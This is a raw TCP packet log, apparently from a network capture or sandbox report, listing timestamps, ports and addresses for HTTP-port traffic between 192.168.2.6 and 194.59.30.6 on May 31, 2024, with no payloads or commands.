                              May 31, 2024 08:09:06.572490931 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.614002943 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.647856951 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647871971 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647883892 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647922039 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647927999 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.647941113 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647953987 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647964001 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647974968 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647981882 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.647985935 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.647999048 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648008108 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648010969 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648021936 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648026943 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648046017 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648057938 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648202896 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648222923 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648236036 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648269892 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648308992 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648327112 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648355007 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648542881 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648555040 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648572922 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648582935 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648596048 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648602009 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648607969 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648622036 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648632050 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648639917 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648682117 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648778915 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648789883 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648801088 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648837090 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648838997 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648852110 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648853064 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648865938 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.648902893 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.648994923 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649049044 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649080992 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649094105 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649115086 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649125099 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649130106 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649139881 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649173975 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649218082 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649230003 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649240971 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649252892 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649264097 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649264097 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649276018 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649280071 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649288893 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.649303913 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.649342060 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.653875113 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.653922081 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.653951883 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.653978109 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654001951 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654032946 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654040098 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654058933 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654069901 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654079914 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654093027 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654103994 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654107094 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654148102 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654278994 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654300928 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654311895 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654350042 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654361963 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654373884 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654376030 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654407024 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654422998 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654542923 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654629946 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654642105 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654653072 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654661894 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654671907 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654685020 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654768944 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654838085 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654923916 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654933929 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654944897 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654956102 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654966116 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.654968977 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.654994011 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655179024 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655196905 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655209064 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655219078 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655230999 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655234098 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655241966 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655252934 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655255079 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655265093 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655283928 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655308008 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655466080 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655508995 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655510902 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655524015 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655570030 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655595064 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655605078 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655610085 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655622959 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655663013 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655781984 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655791998 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655858994 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655868053 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655878067 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655888081 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655900955 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655915022 CEST4971280192.168.2.6194.59.30.6
                              May 31, 2024 08:09:06.655916929 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655930042 CEST8049712194.59.30.6192.168.2.6
                              May 31, 2024 08:09:06.655939102 CEST8049712194.59.30.6192.168.2.6
May 31, 2024 08:09:06.655944109 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.655966043 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.655978918 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.655982971 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.655992031 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.656017065 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.656045914 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734354019 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734379053 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734389067 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734397888 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734410048 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734421015 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734455109 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734499931 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734570026 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734680891 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734690905 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734702110 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734710932 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734719992 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734724998 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734730959 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734743118 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734749079 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734766006 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734770060 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734791994 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734862089 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734873056 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734884977 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734899044 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734909058 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.734914064 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734936953 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.734962940 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.740569115 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740577936 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740585089 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740648985 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.740686893 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740704060 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740714073 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740725040 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740736008 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740746975 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740750074 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.740772009 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.740874052 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740884066 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740894079 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740921021 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.740932941 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.740946054 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741003990 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741043091 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741136074 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741147995 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741158009 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741168022 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741178989 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741199970 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741224051 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741229057 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741246939 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741256952 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741266012 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741285086 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741297007 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741338015 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741375923 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741414070 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741425991 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741437912 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741461039 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741486073 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741581917 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741592884 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741604090 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741614103 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741626978 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741628885 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741676092 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741736889 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741781950 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741785049 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741794109 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741805077 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741827011 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741828918 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741838932 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741864920 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741894007 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741913080 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741925001 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741928101 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.741933107 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741935015 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.741975069 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.746556044 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.746575117 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.746584892 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.746627092 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:06.746633053 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.746644974 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:06.746696949 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:11.454436064 CEST  80     49712  194.59.30.6  192.168.2.6
May 31, 2024 08:09:11.454559088 CEST  49712  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.152048111 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.157242060 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.157354116 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.158371925 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.163202047 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811597109 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811613083 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811656952 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811671972 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811685085 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811697960 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.811768055 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.811768055 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.811768055 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.811768055 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898271084 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898292065 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898396969 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898405075 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898396969 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898446083 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898461103 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898473978 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898495913 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.898502111 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898533106 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898554087 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.898981094 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.899152994 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.906083107 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.906095982 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.906116009 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.906130075 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.906177998 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.906208038 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.984647036 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984663010 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984746933 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984765053 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984802961 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984813929 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984824896 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.984834909 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.984834909 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.984836102 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.984926939 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.984927893 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.985626936 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.985704899 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.992767096 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992779016 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992836952 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.992892027 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992913008 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992924929 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992935896 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992944956 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.992947102 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.992993116 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.992993116 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:35.993760109 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:35.993818998 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071297884 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071351051 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071387053 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071387053 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071542025 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071568966 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071578979 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071608067 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071608067 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071610928 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071641922 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071644068 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.071674109 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.071703911 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.072283030 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072298050 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072305918 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072340012 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.072370052 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.072695017 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072705984 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072715044 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072724104 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.072755098 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.072783947 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079380989 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079405069 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079420090 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079427958 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079432964 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079487085 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079556942 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079735994 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079755068 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079767942 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079785109 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079824924 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079824924 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079824924 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079850912 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079862118 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.079890013 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.079920053 CEST  51544  80     192.168.2.6  194.59.30.6
May 31, 2024 08:09:36.165472984 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165504932 CEST  80     51544  194.59.30.6  192.168.2.6
May 31, 2024 08:09:36.165515900 CEST  80     51544  194.59.30.6  192.168.2.6
